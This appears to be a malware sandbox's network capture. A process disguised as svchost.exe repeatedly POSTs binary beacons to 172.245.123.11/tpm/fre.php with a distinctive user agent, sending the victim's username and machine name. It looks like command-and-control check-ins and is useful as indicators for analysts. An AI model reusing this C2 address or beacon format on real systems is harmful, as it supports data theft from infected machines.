Jan 7, 2025 11:02:15.898263931 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:16.407164097 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:16 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49742	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:16.556257963 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:16.561248064 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:17.069873095 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:16 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49748	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:17.271879911 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:17.278413057 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:17.794280052 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:17 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49754	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:17.954827070 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:17.961173058 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:18.478518009 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:18 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49760	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:18.635102987 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:18.640080929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:19.157036066 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:19 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49766	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:19.322249889 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:19.327075005 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:19.851816893 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:19 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49772	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:20.038256884 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:20.043059111 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:20.564466000 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:20 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49778	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:20.737291098 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:20.742103100 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:21.267196894 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:21 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49784	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:21.426393032 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:21.431219101 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:21.949470043 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:21 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49790	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:22.117657900 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:22.122622013 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:22.615750074 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:22 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49795	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:22.796658039 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:22.801706076 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:23.331206083 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:23 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49801	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:23.519656897 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:23.524470091 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:24.058000088 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:23 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49804	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:24.242893934 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:24.248034000 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:24.758451939 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:24 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49810	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:24.973608971 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:24.981285095 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:25.495547056 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:25 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49815	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:25.665812969 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:25.670615911 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:26.181912899 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:26 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49821	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:26.418051958 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:26.424355984 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:26.935461998 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:26 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49828	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:27.139137030 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:27.144150019 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:27.635956049 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:27 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49834	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:27.942557096 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:27.947959900 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:28.470149040 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:28 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49839	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:28.633147001 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:28.637968063 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:29.132283926 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:29 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49843	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:29.303556919 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:29.308443069 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:29.819360018 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:29 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49849	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:30.080763102 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
